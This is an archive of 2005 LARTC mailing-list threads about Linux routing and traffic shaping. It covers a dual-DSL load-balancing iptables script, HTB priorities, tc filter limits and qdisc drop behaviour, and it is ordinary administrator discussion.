#!/bin/sh
# Iptables userspace executable
IPTABLES="/sbin/iptables"
# Internal Interface
NET_INT_INT=eth1
# Internal IP
NET_INT_IP=192.168.0.101
# Internal Subnet
NET_INT_SUB=/24
# Internal Network
NET_INT_NET=192.168.0.0
# First external interface
NET_EXT_INT1=eth0
# First external IP
NET_EXT_IP1=192.168.1.7
# First external interface's gateway
NET_EXT_GW1=192.168.1.1
# Second external interface
NET_EXT_INT2=eth2
# Second external IP
NET_EXT_IP2=192.168.1.3
# Second external interface's gateway
NET_EXT_GW2=192.168.1.1
echo "Flushing All Tables"
$IPTABLES -F
$IPTABLES -F -t nat
$IPTABLES -F -t mangle
$IPTABLES -X -t nat
$IPTABLES -X -t mangle
$IPTABLES -X

$IPTABLES -t mangle -N ETH0
$IPTABLES -t mangle -F ETH0
$IPTABLES -t mangle -A ETH0 -j MARK --set-mark 1

$IPTABLES -t mangle -N ETH2
$IPTABLES -t mangle -F ETH2
$IPTABLES -t mangle -A ETH2 -j MARK --set-mark 2

$IPTABLES -t nat -N SPOOF_ETH0
$IPTABLES -t nat -F SPOOF_ETH0
$IPTABLES -t nat -A SPOOF_ETH0 -j SNAT --to ${NET_EXT_IP1}

$IPTABLES -t nat -N SPOOF_ETH2
$IPTABLES -t nat -F SPOOF_ETH2
$IPTABLES -t nat -A SPOOF_ETH2 -j SNAT --to ${NET_EXT_IP2}

echo "Setting some local network rules..."
$IPTABLES -A INPUT -p icmp -s ${NET_INT_NET}/24 -d ${NET_INT_IP} -j ACCEPT

echo "Setting Mangle rules for eth0..."
$IPTABLES -t mangle -A OUTPUT -o ! ${NET_INT_INT} -m random --average 50 -j ETH0
$IPTABLES -t mangle -A PREROUTING -i ${NET_INT_INT} -m random --average 50 -j ETH0
ip ro add table 10 default via ${NET_EXT_GW1} dev ${NET_EXT_INT1}
ip ru add fwmark 1 table 10
ip ro fl ca

echo "Setting Mangle rules for eth2..."
$IPTABLES -t mangle -A OUTPUT -o ! ${NET_INT_INT} -m random --average 50 -j ETH2
$IPTABLES -t mangle -A PREROUTING -i ${NET_INT_INT} -m random --average 50 -j ETH2
ip ro add table 20 default via ${NET_EXT_GW2} dev ${NET_EXT_INT2}
ip ru add fwmark 2 table 20
ip ro fl ca

echo "Setting up spoofing rules..."
$IPTABLES -t nat -A POSTROUTING -o ${NET_EXT_INT1} -j SPOOF_ETH0
$IPTABLES -t nat -A POSTROUTING -o ${NET_EXT_INT2} -j SPOOF_ETH2

echo "Adding default route..."
ip ro add default nexthop via ${NET_EXT_GW1} dev ${NET_EXT_INT1} weight 1 nexthop via ${NET_EXT_GW2} dev ${NET_EXT_INT2} weight 1

echo "Disabling Reverse Path Filtering..."
echo 0 > /proc/sys/net/ipv4/conf/eth0/rp_filter
echo 0 > /proc/sys/net/ipv4/conf/eth2/rp_filter

echo "Enabling IPv4 Packet forwarding..."
echo "1" > /proc/sys/net/ipv4/ip_forward

-- roderick e. tapang retapang at gmail dot com (o_.' http://counter.li.org/ //\ ---------------------- V_/_ Linux User # 253842 From nug@sch.bme.hu Tue Jan 18 08:30:05 2005 From: nug@sch.bme.hu (Tóth Nándor) Date: Tue, 18 Jan 2005 09:30:05 +0100 Subject: [LARTC] failover works - but balancing does not In-Reply-To: References: Message-ID: <41ECC90D.7010206@sch.bme.hu> Hi! roderick tapang wrote: > here's the setup (two dsl - same provider) > > +-----> link1 > LAN----- linux box --| |----------internet > +-----> link2 > > the setup is ok in terms of the failover requirement. the other link > takes over when one is down. however, there is a very noticeable lag > when both lines are up. i've tried changing the weight value to a > higher one but the links are still under utilized and some client machines > playing games or mostly disconnected. taking down one link makes the > connection ok. > any suggestions? do i need to patch the kernel? I was in the situation like yours. Following the lartc howto did not result in correct functionality (not the same problems as yours). I managed to do it using these links: http://www.ssi.bg/~ja/nano.txt http://www.ssi.bg/~ja/#routes I had to read the nano howto about 5 times to understand it.
-- Udv, Nandor From nug@sch.bme.hu Tue Jan 18 08:35:12 2005 From: nug@sch.bme.hu (Tóth Nándor) Date: Tue, 18 Jan 2005 09:35:12 +0100 Subject: [LARTC] Doubt regarding priority of classes with HTB In-Reply-To: <20050118061115.8420123EF73@ws5-4.us4.outblaze.com> References: <20050118061115.8420123EF73@ws5-4.us4.outblaze.com> Message-ID: <41ECCA40.7090602@sch.bme.hu> Hi! sanjeev ravindran wrote: > Hi, > > I'm a bit confused with the priority of different classes with HTB. How it will be? Will the class with lowest no: have maximum priority? > > Any help is most appreciated, > Thanks in advance, > Sanjeev http://luxik.cdi.cz/~devik/qos/htb/manual/userg.htm#prio "Priorizing traffic has two sides. First it affects how the excess bandwidth is distributed among siblings. Up to now we have seen that excess bandwidth was distibuted according to rate ratios. Now I used basic configuration from chapter 3 (hierarchy without ceiling and bursts) and changed priority of all classes to 1 except SMTP (green) which I set to 0 (higher). From sharing view you see that the class got all the excess bandwidth. The rule is that classes with higher priority are offered excess bandwidth first. But rules about guaranted rate and ceil are still met."
-- Udv, Nandor From toto@fortesys.ro Tue Jan 18 08:32:47 2005 From: toto@fortesys.ro (Iosif Peterfi) Date: Tue, 18 Jan 2005 10:32:47 +0200 Subject: [LARTC] iproute2 + iptables - match the connection time or packets sent/recieved References: <009501c4fc9b$3fd8f4d0$da01a8c0@FORTEWKS001> <200501171150.27568.jasonb@edseek.com> Message-ID: <00d001c4fd38$4f2a88c0$da01a8c0@FORTEWKS001> ----- Original Message ----- From: "Jason Boxman" To: Sent: Monday, January 17, 2005 6:50 PM Subject: Re: [LARTC] iproute2 + iptables - match the connection time or packets sent/recieved > On Monday 17 January 2005 08:48, Iosif Peterfi wrote: > > Hello, > > > > > All i want to do is shape the web traffic for long conections wich are not > > HTML webpages, i want to slow down those connections. > > I know that can be overriden by stopin/resuming the transfer but i still > > want to do it since people start downloading from HTTP with many > > connections, during the day and leave the office, i have no time to hunt > > them, so i just want to classify those connections if is possible. > > Sure, you can do that with the connbytes Netfilter module. After someone > downloads some given amount of data you can reclassify that traffic from > interactive-Web to bulk-Web or something similar. I've been meaning to do > this myself, but haven't gotten to it. Thanks a lot ! That was very usefull. I had some problems patching the kernel (I had to do it manually) since my gentoo kernel is already patched with a lot of other patches, but i managed to do it and works like a charm. > > -- > > Jason Boxman > Perl Programmer / *NIX Systems Administrator > Shimberg Center for Affordable Housing | University of Florida > http://edseek.com/ - Linux and FOSS stuff > > _______________________________________________ > LARTC mailing list / LARTC@mailman.ds9a.nl > http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/ > > > -- > This message was scanned for spam and viruses by BitDefender. 
> For more information please visit http://linux.bitdefender.com/ > > -- This message was scanned for spam and viruses by BitDefender. For more information please visit http://linux.bitdefender.com/ From Stanislav Nedelchev Tue Jan 18 14:29:59 2005 From: Stanislav Nedelchev (Stanislav Nedelchev) Date: Tue, 18 Jan 2005 16:29:59 +0200 Subject: [LARTC] stanislav.nedelchev@gmail.com Message-ID: <485817760501180629dfed89c@mail.gmail.com> stanislav.nedelchev@gmail.com From ro0ot@phreaker.net Tue Jan 18 14:34:06 2005 From: ro0ot@phreaker.net (ro0ot) Date: Tue, 18 Jan 2005 22:34:06 +0800 Subject: [LARTC] failover works - but balancing does not In-Reply-To: References: Message-ID: <41ED1E5E.3080707@phreaker.net> Hi, Can I know how is your failover works? Any additional scripts? Regards, ro0ot roderick tapang wrote: >here's the setup (two dsl - same provider) > > +-----> link1 >LAN----- linux box --| |----------internet > +-----> link2 > >the setup is ok in terms of the failover requirement. the other link >takes over when one is down. however, there is a very noticeable lag >when both lines are up. i've tried changing the weight value to a >higher one but the links are still under utilized and some client machines >playing games or mostly disconnected. taking down one link makes the >connection ok. >any suggestions? do i need to patch the kernel? > >below is the script i'm using on a mandrake 10.1 box. > >thanks.
>erik > > >#!/bin/sh ># Iptables userspace executable >IPTABLES="/sbin/iptables" ># Internal Interface >NET_INT_INT=eth1 ># Internal IP >NET_INT_IP=192.168.0.101 ># Internal Subnet >NET_INT_SUB=/24 ># Internal Network >NET_INT_NET=192.168.0.0 ># First external interface >NET_EXT_INT1=eth0 ># First external IP >NET_EXT_IP1=192.168.1.7 ># First external interface's gateway >NET_EXT_GW1=192.168.1.1 ># Second external interface >NET_EXT_INT2=eth2 ># Second external IP >NET_EXT_IP2=192.168.1.3 ># Second external interface's gateway >NET_EXT_GW2=192.168.1.1 >echo "Flushing All Tables" >$IPTABLES -F >$IPTABLES -F -t nat >$IPTABLES -F -t mangle >$IPTABLES -X -t nat >$IPTABLES -X -t mangle >$IPTABLES -X > >$IPTABLES -t mangle -N ETH0 >$IPTABLES -t mangle -F ETH0 >$IPTABLES -t mangle -A ETH0 -j MARK --set-mark 1 > >$IPTABLES -t mangle -N ETH2 >$IPTABLES -t mangle -F ETH2 >$IPTABLES -t mangle -A ETH2 -j MARK --set-mark 2 > >$IPTABLES -t nat -N SPOOF_ETH0 >$IPTABLES -t nat -F SPOOF_ETH0" >$IPTABLES -t nat -A SPOOF_ETH0 -j SNAT --to ${NET_EXT_IP1} > >$IPTABLES -t nat -N SPOOF_ETH2 >$IPTABLES -t nat -F SPOOF_ETH2H2 " >$IPTABLES -t nat -A SPOOF_ETH2 -j SNAT --to ${NET_EXT_IP2} > >echo "Setting some local network rules..." >$IPTABLES -A INPUT -p icmp -s ${NET_INT_NET}/24 -d ${NET_INT_IP} -j ACCEPT > >echo "Setting Mangle rules for eth0..." >$IPTABLES -t mangle -A OUTPUT -o ! ${NET_INT_INT} -m random --average 50 -j ETH0 >$IPTABLES -t mangle -A PREROUTING -i ${NET_INT_INT} -m random >--average 50 -j ETH0 >ip ro add table 10 default via ${NET_EXT_GW1} dev ${NET_EXT_INT1} >ip ru add fwmark 1 table 10 >ip ro fl ca > >echo "Setting Mangle rules for eth2..." >$IPTABLES -t mangle -A OUTPUT -o ! ${NET_INT_INT} -m random --average 50 -j ETH2 >$IPTABLES -t mangle -A PREROUTING -i ${NET_INT_INT} -m random >--average 50 -j ETH2 >ip ro add table 20 default via ${NET_EXT_GW2} dev ${NET_EXT_INT2} >ip ru add fwmark 2 table 20 >ip ro fl ca > >echo "Setting up spoofing rules..." 
>$IPTABLES -t nat -A POSTROUTING -o ${NET_EXT_INT1} -j SPOOF_ETH0 >$IPTABLES -t nat -A POSTROUTING -o ${NET_EXT_INT2} -j SPOOF_ETH2 > >echo "Adding default route..." >ip ro add default nexthop via ${NET_EXT_GW1} dev ${NET_EXT_INT1} >weight 1 nexthop via ${NET_EXT_GW2} dev ${NET_EXT_INT2} weight 1 > >echo "Disabling Reverse Path Filtering..." >echo 0> /proc/sys/net/ipv4/conf/eth0/rp_filter >echo 0> /proc/sys/net/ipv4/conf/eth2/rp_filter > >echo "Enabling IPv4 Packet forwarding..." >echo "1"> /proc/sys/net/ipv4/ip_forward > > > > From RMoore@afsc.org Tue Jan 18 15:26:15 2005 From: RMoore@afsc.org (Rob Moore) Date: Tue, 18 Jan 2005 10:26:15 -0500 Subject: [LARTC] Archives and question Message-ID: Hello-- I am brand new to this list. I've been using a pre-packaged subset of Linux that comes with an application called IPCop. (If you're unfamiliar with IPCop, I think it's a wonderful, easy-to-use firewall application that will run on pretty low-end hardware.) But otherwise I'm pretty much a neophyte with Linux. Two questions: 1. Is there an archive for this list so I can look for previous postings on my topic? 2. I have a hub-and-spoke network, made up of about 30 IPCop firewalls in remote offices that all VPN back to an IPCop box here in the main office. The remote offices can all communicate with the main office, but none can communicate with each other directly. I need to get that inter-remote-site communication to work. I'm thinking some routing table entries ought to be able to do it, but I'm not familiar enough [read: not familiar at all] with Linux routing to know how to set it up. I'm hoping you all can tell me, A)if it will work or not, and B)how to get started. 
Thanks, Rob From sanjeev_ravindran@linuxmail.org Tue Jan 18 15:47:45 2005 From: sanjeev_ravindran@linuxmail.org (sanjeev ravindran) Date: Tue, 18 Jan 2005 23:47:45 +0800 Subject: [LARTC] Doubt regarding priority of classes with HTB Message-ID: <20050118154745.0B97023CF9@ws5-3.us4.outblaze.com> Thank you for ur response, Actually I too found the same in user guide of htb... however i was bit confused about the priority of different classes.... now things are clear... thanks again sanjeev ----- Original Message ----- From: "Tóth Nándor" To: lartc@mailman.ds9a.nl Subject: Re: [LARTC] Doubt regarding priority of classes with HTB Date: Tue, 18 Jan 2005 09:35:12 +0100 > > Hi! > > sanjeev ravindran wrote: > > Hi, > > > > I'm a bit confused with the priority of different classes with > > HTB. How it will be? Will the class with lowest no: have maximum > > priority? > > > > Any help is most appreciated, > > Thanks in advance, > > Sanjeev > > http://luxik.cdi.cz/~devik/qos/htb/manual/userg.htm#prio > > "Priorizing traffic has two sides. First it affects how the excess > bandwidth is distributed among siblings. Up to now we have seen > that excess bandwidth was distibuted according to rate ratios. Now > I used basic configuration from chapter 3 (hierarchy without > ceiling and bursts) and changed priority of all classes to 1 except > SMTP (green) which I set to 0 (higher). > From sharing view you see that the class got all the excess > bandwidth. The rule is that classes with higher priority are > offered excess bandwidth first. But rules about guaranted rate and > ceil are still met."
> > -- Udv, > Nandor > _______________________________________________ > LARTC mailing list / LARTC@mailman.ds9a.nl > http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/ -- ______________________________________________ Check out the latest SMS services @ http://www.linuxmail.org This allows you to send and receive SMS through your mailbox. Powered by Outblaze From dmitry@mikrotik.com Tue Jan 18 17:02:17 2005 From: dmitry@mikrotik.com (Dmitry Golubev) Date: Tue, 18 Jan 2005 19:02:17 +0200 Subject: [LARTC] Doubt regarding priority of classes with HTB In-Reply-To: <20050118154745.0B97023CF9@ws5-3.us4.outblaze.com> References: <20050118154745.0B97023CF9@ws5-3.us4.outblaze.com> Message-ID: <200501181902.17426.dmitry@mikrotik.com> Are you sure we do care about priorities of inner classes? It seems for me that you do not even have this entry in the memory structure in case of inner class - only leaf classes have prios. Dmitry On Tuesday 18 January 2005 17:47, "sanjeev ravindran" wrote: > Thank you for ur response, > Actually I too found the same in user guide of htb... however i was bit > confused about the priority of different classes.... now things are > clear... > thanks again > sanjeev > > > > ----- Original Message ----- > From: "Tóth Nándor" > To: lartc@mailman.ds9a.nl > Subject: Re: [LARTC] Doubt regarding priority of classes with HTB > Date: Tue, 18 Jan 2005 09:35:12 +0100 > > > Hi! > > > > sanjeev ravindran wrote: > > > Hi, > > > > > > I'm a bit confused with the priority of different classes with > > > HTB. How it will be? Will the class with lowest no: have maximum > > > priority? > > > > > > Any help is most appreciated, > > > Thanks in advance, > > > Sanjeev > > > > http://luxik.cdi.cz/~devik/qos/htb/manual/userg.htm#prio > > > > "Priorizing traffic has two sides. First it affects how the excess > > bandwidth is distributed among siblings.
Up to now we have seen > > that excess bandwidth was distibuted according to rate ratios. Now > > I used basic configuration from chapter 3 (hierarchy without > > ceiling and bursts) and changed priority of all classes to 1 except > > SMTP (green) which I set to 0 (higher). > > From sharing view you see that the class got all the excess > > bandwidth. The rule is that classes with higher priority are > > offered excess bandwidth first. But rules about guaranted rate and > > ceil are still met." > > > > -- Udv, > > Nandor > > _______________________________________________ > > LARTC mailing list / LARTC@mailman.ds9a.nl > > http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/ From rio@martin.mu Wed Jan 19 10:32:17 2005 From: rio@martin.mu (Rio Martin.) Date: Wed, 19 Jan 2005 10:32:17 +0000 Subject: [LARTC] Confuse, putting packets in wrong mangle table. Message-ID: <200501191032.17988.rio@martin.mu> Folks, I am a little bit confuse in how to put these packets into correct mangle table for traffic shaping. This is what i ve planned to do: - - - - :eth0 [ LINUX-BOX ] eth1: - - - - Let say: eth0: 220.100.1.1 eth1: 192.168.1.1 eth1:1 192.168.1.2 192.168.1.0/24 get natted into 220.100.1.1 before reaching the internet. I put every packets coming from internet (eth0) this way: # iptables -t mangle -I PREROUTING -i eth0 .. * * * * But what if i would like to do the same way with ip 192.168.1.1 and 192.168.1.2 ? How to put the packets in correct mangle table? Thanks before .. Regards, Rio Martin. From nug@sch.bme.hu Wed Jan 19 08:19:58 2005 From: nug@sch.bme.hu (Tóth Nándor) Date: Wed, 19 Jan 2005 09:19:58 +0100 Subject: [LARTC] Confuse, putting packets in wrong mangle table. In-Reply-To: <200501191032.17988.rio@martin.mu> References: <200501191032.17988.rio@martin.mu> Message-ID: <41EE182E.3000406@sch.bme.hu> Hi! Rio Martin.
wrote: > Folks, > I am a little bit confuse in how to put these packets into correct mangle > table for traffic shaping. > > This is what i ve planned to do: > > - - - - :eth0 [ LINUX-BOX ] eth1: - - - - > > Let say: > eth0: 220.100.1.1 > eth1: 192.168.1.1 > eth1:1 192.168.1.2 > > 192.168.1.0/24 get natted into 220.100.1.1 before reaching the internet. > I put every packets coming from internet (eth0) this way: > # iptables -t mangle -I PREROUTING -i eth0 .. * * * * > > But what if i would like to do the same way with ip 192.168.1.1 and > 192.168.1.2 ? How to put the packets in correct mangle table? You can only shape traffic leaving your interface. You have to shape the incoming traffic at interface eth1, the outgoing traffic at interface eth0. This site is great for learning: http://www.knowplace.org/shaper/qdisc.html#egress I found to use iptables+CLASSIFY method the easiest way to classify packets. Your question is a little dizzy... -- Udv, Nandor From rio@martin.mu Wed Jan 19 16:57:15 2005 From: rio@martin.mu (Rio Martin.) Date: Wed, 19 Jan 2005 16:57:15 +0000 Subject: [LARTC] Re: Confuse, putting packets in wrong mangle table. Message-ID: <200501191657.15767.rio@martin.mu> On Wed, 19 Jan 2005 09:19:58 +0100 Tóth Nándor wrote: Rio Martin. wrote: >> Folks, >> I am a little bit confuse in how to put these packets into correct mangle >> table for traffic shaping. >> This is what i ve planned to do: >> >> - - - - :eth0 [ LINUX-BOX ] eth1: - - - - >> >> Let say: >> eth0: 220.100.1.1 >> eth1: 192.168.1.1 >> eth1:1 192.168.1.2 >> >> 192.168.1.0/24 get natted into 220.100.1.1 before reaching the internet. >> I put every packets coming from internet (eth0) this way: >> # iptables -t mangle -I PREROUTING -i eth0 .. * * * * >> >> But what if i would like to do the same way with ip 192.168.1.1 and >> 192.168.1.2 ? How to put the packets in correct mangle table? >You can only shape traffic leaving your interface.
You have to shape the incoming traffic at interface eth1, the outgoing traffic at interface eth0.
>This site is great for learning:
>http://www.knowplace.org/shaper/qdisc.html#egress
>I found to use iptables+CLASSIFY method the easiest way to classify packets.
>
>Your question is a little dizzy...

Oops sorry then :))
Actually, there is squid proxy running in my box, with those two private IPs
(192.168.1.1 & 192.168.1.2) Both get natted to 220.100.1.1.
I need to shape incoming traffic to both of these ips but i am afraid i have
to face that i am not able to shape traffic which is generated from this box
unless those two IPs were outside the box.
If i have one more public IP then i should not so much worry about, cause i
can shape it using IMQ.

So any other ideas maybe? i'm thinking just in case IMQ would help ..
Thanks for the info u gave anyway..

- Rio.Martin -

From liviu.faciu@astral.ro Wed Jan 19 10:12:00 2005
From: liviu.faciu@astral.ro (Liviu Faciu)
Date: Wed, 19 Jan 2005 12:12:00 +0200
Subject: [LARTC] Writing rules direct to Kernel
Message-ID: <1106129520.9814.100.camel@tehnic6.bacau.astral.ro>

Hi,

I'm interested to write rules direct in Kernel space memory and not to
execute the tc command. Have anyone done this before ? Any ideas ?
Sources ?
Thank you,
Liviu

--
This message was scanned for spam and viruses by BitDefender.
For more information please visit http://linux.bitdefender.com/

From victor@nk.nl Wed Jan 19 11:24:53 2005
From: victor@nk.nl (Victor Julien)
Date: Wed, 19 Jan 2005 11:24:53 +0000
Subject: [LARTC] Writing rules direct to Kernel
In-Reply-To: <1106129520.9814.100.camel@tehnic6.bacau.astral.ro>
References: <1106129520.9814.100.camel@tehnic6.bacau.astral.ro>
Message-ID: <41EE4385.6030705@nk.nl>

Liviu Faciu wrote:
> Hi,
>
> I'm interested to write rules direct in Kernel space memory and not to
> execute the tc command. Have anyone done this before ? Any ideas ?
> Sources ?
> Thank you, > Liviu > > > Hi Liviu, take a look at this: http://www.coverfire.com/lql/ i have no experience with it, but it looks promising... Regards, Victor From util@deuroconsult.ro Wed Jan 19 10:27:40 2005 From: util@deuroconsult.ro (Catalin(ux aka Dino) BOIE) Date: Wed, 19 Jan 2005 12:27:40 +0200 (EET) Subject: [LARTC] Writing rules direct to Kernel In-Reply-To: <1106129520.9814.100.camel@tehnic6.bacau.astral.ro> References: <1106129520.9814.100.camel@tehnic6.bacau.astral.ro> Message-ID: On Wed, 19 Jan 2005, Liviu Faciu wrote: > Hi, > > I'm interested to write rules direct in Kernel space memory and not to > execute the tc command. Have anyone done this before ? Any ideas ? > Sources ? > Thank you, > Liviu Take a look at iproute2 sources. There you have a lib that you can use to what you want. Yes, is doable. > > > > -- > This message was scanned for spam and viruses by BitDefender. > For more information please visit http://linux.bitdefender.com/ > > > _______________________________________________ > LARTC mailing list / LARTC@mailman.ds9a.nl > http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/ > --- Catalin(ux aka Dino) BOIE catab at deuroconsult.ro http://kernel.umbrella.ro/ From George Alexandru Dragoi Wed Jan 19 10:53:57 2005 From: George Alexandru Dragoi (George Alexandru Dragoi) Date: Wed, 19 Jan 2005 12:53:57 +0200 Subject: [LARTC] Writing rules direct to Kernel In-Reply-To: References: <1106129520.9814.100.camel@tehnic6.bacau.astral.ro> Message-ID: <3063e5050119025336f2dee1@mail.gmail.com> I'm intersted too in a program that take an entire qos struncture tree and filters and put them instantly in kernel, like iptables, i wonder if there is such project On Wed, 19 Jan 2005 12:27:40 +0200 (EET), Catalin(ux aka Dino) BOIE wrote: > On Wed, 19 Jan 2005, Liviu Faciu wrote: > > > Hi, > > > > I'm interested to write rules direct in Kernel space memory and not to > > execute the tc command. Have anyone done this before ? Any ideas ? 
> > Sources ?
> > Thank you,
> > Liviu
>
> Take a look at iproute2 sources. There you have a lib that you can use to
> what you want. Yes, is doable.
>
> ---
> Catalin(ux aka Dino) BOIE
> catab at deuroconsult.ro
> http://kernel.umbrella.ro/

--
Bla bla

From Martin Schiøtz Wed Jan 19 11:33:53 2005
From: Martin Schiøtz (Martin Schiøtz)
Date: Wed, 19 Jan 2005 12:33:53 +0100
Subject: [LARTC] tc limit
Message-ID:

Hi

I have been playing with tc. I'm using htb and sfq. I tried to setup
shaping of every ip address within a /20.
I found that there must be an upper limit of about 2096 on the number
of rules (classes, qdiscs or filters). I was testing a /20 which gives
4096 classes, qdiscs and filters. I'm using hashkey to optimize
processing of frames.

When executing the script below - it stops when adding rules for "ip
10.0.7.253" with this error:

handle 1:4097
handle 1:4099
handle 1:4101
RTNETLINK answers: File exists
We have an error talking to the kernel
handle 1:4103
RTNETLINK answers: File exists
We have an error talking to the kernel
handle 1:4105
...
...
etc.

Is there a limit with tc or am I doing something wrong ?
(I'm using iproute2-2.6.9-041019)

This is the script:

#!/bin/sh

/sbin/tc qdisc add dev eth1 root handle 1: htb
/sbin/tc class add dev eth1 parent 1: classid 1:3 htb rate 34mbit ceil 34mbit burst 0kbit cburst 0kbit
/sbin/tc filter add dev eth1 parent 1:3 protocol ip u32
/sbin/tc filter add dev eth1 parent 1:3 handle 3: protocol ip u32 divisor 256
/sbin/tc filter add dev eth1 protocol ip parent 1: u32 match ip dst 10.0.0.0/20 hashkey mask 0x000000ff at 16 link 3:

echo handle 1:13
/sbin/tc class add dev eth1 parent 1:3 classid 1:13 htb rate 512kbit ceil 512kbit burst 0k cburst 0k
/sbin/tc qdisc add dev eth1 parent 1:13 handle 13: sfq perturb 4
/sbin/tc filter add dev eth1 protocol ip parent 1:3 u32 ht 3:1: match ip dst 10.0.0.1 flowid 1:13

echo handle 1:15
/sbin/tc class add dev eth1 parent 1:3 classid 1:15 htb rate 512kbit ceil 512kbit burst 0k cburst 0k
/sbin/tc qdisc add dev eth1 parent 1:15 handle 15: sfq perturb 4
/sbin/tc filter add dev eth1 protocol ip parent 1:3 u32 ht 3:2: match ip dst 10.0.0.2 flowid 1:15
...
...
echo handle 1:4101
/sbin/tc class add dev eth1 parent 1:3 classid 1:4101 htb rate 512kbit ceil 512kbit burst 0k cburst 0k
/sbin/tc qdisc add dev eth1 parent 1:4101 handle 4101: sfq perturb 4
/sbin/tc filter add dev eth1 protocol ip parent 1:3 u32 ht 3:fd: match ip dst 10.0.7.253 flowid 1:4101
...
...
echo handle 1:8201
/sbin/tc class add dev eth1 parent 1:3 classid 1:8201 htb rate 512kbit ceil 512kbit burst 0k cburst 0k
/sbin/tc qdisc add dev eth1 parent 1:8201 handle 8201: sfq perturb 4
/sbin/tc filter add dev eth1 protocol ip parent 1:3 u32 ht 3:ff: match ip dst 10.0.15.255 flowid 1:8201

From gypsy@iswest.com Wed Jan 19 15:12:56 2005
From: gypsy@iswest.com (gypsy)
Date: Wed, 19 Jan 2005 07:12:56 -0800
Subject: [LARTC] tc limit
References:
Message-ID: <41EE78F8.4826B6C8@iswest.com>

Martin Schiøtz wrote:
>
> Hi

Hello.

> I have been playing with tc. I'm using htb and sfq. I tried to setup
> shaping of every ip address within a /20.
> I found that there must be an upper limit of about 2096 on the number
> of rules (classes, qdiscs or filters). I was testing a /20 which gives
> 4096 classes, qdiscs and filters. I'm using hashkey to optimize
> processing of frames.

Filters.

> Is there a limit with tc or am I doing something wrong ?

Yes, sort of. Yes.

> This is the script:
> #!/bin/sh
>
> /sbin/tc filter add dev eth1 parent 1:3 protocol ip u32

'prio #' must be included in all 'filter' lines where "#" is not zero
and is always the same; the "zero prio" has a limit and there is a limit
on '#' - but no limit on how many times '#' can be (e.g.) 5

So, e.g.:
tc filter add dev eth1 parent 1: protocol ip prio 5 \
   u32 match ip src $IP flowid 1:40

will run at least 64K times without complaint, but this will fail after
~2K:
tc filter add dev eth1 parent 1: protocol ip prio 0 \
   u32 match ip src $IP flowid 1:40

> /sbin/tc filter add dev eth1 parent 1:3 handle 3: protocol ip u32 divisor 256
> /sbin/tc filter add dev eth1 protocol ip parent 1: u32 match ip dst
> 10.0.0.0/20 hashkey mask 0x000000ff at 16 link 3:

google LARTC please document

gypsy

From liviu.faciu@astral.ro Wed Jan 19 15:36:31 2005
From: liviu.faciu@astral.ro (Liviu Faciu)
Date: Wed, 19 Jan 2005 17:36:31 +0200
Subject: [LARTC] Writing rules direct to Kernel
In-Reply-To: <41EE4385.6030705@nk.nl>
References: <1106129520.9814.100.camel@tehnic6.bacau.astral.ro> <41EE4385.6030705@nk.nl>
Message-ID: <1106148991.9814.132.camel@tehnic6.bacau.astral.ro>

Thank you,
Very good idea.

Liviu

On Wed, 2005-01-19 at 11:24 +0000, Victor Julien wrote:
> Liviu Faciu wrote:
> > Hi,
> >
> > I'm interested to write rules direct in Kernel space memory and not to
> > execute the tc command. Have anyone done this before ? Any ideas ?
> > Sources ?
> > Thank you,
> > Liviu
> >
>
> Hi Liviu,
>
> take a look at this:
> http://www.coverfire.com/lql/
>
> i have no experience with it, but it looks promising...
>
> Regards,
> Victor
>

From Martin Schiøtz Wed Jan 19 16:54:02 2005
From: Martin Schiøtz (Martin Schiøtz)
Date: Wed, 19 Jan 2005 17:54:02 +0100
Subject: [LARTC] tc limit
In-Reply-To: <41EE78F8.4826B6C8@iswest.com>
References: <41EE78F8.4826B6C8@iswest.com>
Message-ID:

Thanks, with "prio #" on all filters - all rules can be added.
:-)

Just curious - Is there a reason for the ~2K limit on filters with "prio 0"?

Martin

On Wed, 19 Jan 2005 07:12:56 -0800, gypsy wrote:
> Martin Schiøtz wrote:
> >
> > Hi
>
> Hello.
>
> > I have been playing with tc. I'm using htb and sfq. I tried to setup
> > shaping of every ip address within a /20.
> > I found that there must be an upper limit of about 2096 on the number
> > of rules (classes, qdiscs or filters). I was testing a /20 which gives
> > 4096 classes, qdiscs and filters. I'm using hashkey to optimize
> > processing of frames.
>
> Filters.
>
> > Is there a limit with tc or am I doing something wrong ?
>
> Yes, sort of. Yes.
>
> > This is the script:
> > #!/bin/sh
> >
>
> > /sbin/tc filter add dev eth1 parent 1:3 protocol ip u32
>
> 'prio #' must be included in all 'filter' lines where "#" is not zero
> and is always the same; the "zero prio" has a limit and there is a limit
> on '#' - but no limit on how many times '#' can be (e.g.)
5
>
> So, e.g.:
> tc filter add dev eth1 parent 1: protocol ip prio 5 \
>    u32 match ip src $IP flowid 1:40
>
> will run at least 64K times without complaint, but this will fail after
> ~2K:
> tc filter add dev eth1 parent 1: protocol ip prio 0 \
>    u32 match ip src $IP flowid 1:40
>
> > /sbin/tc filter add dev eth1 parent 1:3 handle 3: protocol ip u32 divisor 256
> > /sbin/tc filter add dev eth1 protocol ip parent 1: u32 match ip dst
> > 10.0.0.0/20 hashkey mask 0x000000ff at 16 link 3:
>
> google LARTC please document
>
> gypsy
>

From fx.lebail@free.fr Wed Jan 19 17:09:34 2005
From: fx.lebail@free.fr (Francois-Xavier Le Bail)
Date: Wed, 19 Jan 2005 18:09:34 +0100
Subject: [LARTC] ip route, rule and TOS
Message-ID: <1106154574.41ee944e8a6db@imp4-q.free.fr>

Hello,

if I use :
# ip rule add tos reliability iif lo lookup table_1
# ip route add default via <@IP> table table_1

It seems that the response packets for the ones sent with a TOS of "reliability"
need to have the same TOS or they are dropped by the kernel (2.4.25).

Why ?

Francois-Xavier

From vincent-perrier@club-internet.fr Wed Jan 19 21:42:19 2005
From: vincent-perrier@club-internet.fr (vincent perrier)
Date: Wed, 19 Jan 2005 22:42:19 +0100
Subject: [LARTC] tail and head drop qdiscs
Message-ID: <1106170939.10019.23.camel@localhost.localdomain>

I think that there are no qdiscs that permit to drop the oldest frame
of a queue when this queue is full, but I would like to be wrong:

bfifo drops arriving frames when the max queue length is reached.

red also drops arriving frames in a more elaborate fashion, with
a drop probability that increases above a limit and becomes a
drop certitude when the max queue length is reached.

sfq drops "fairly", it piles frames with same (ip source, ip dest,
port source and port dest) and drops a frame from the biggest pile
to favour the smaller flows.
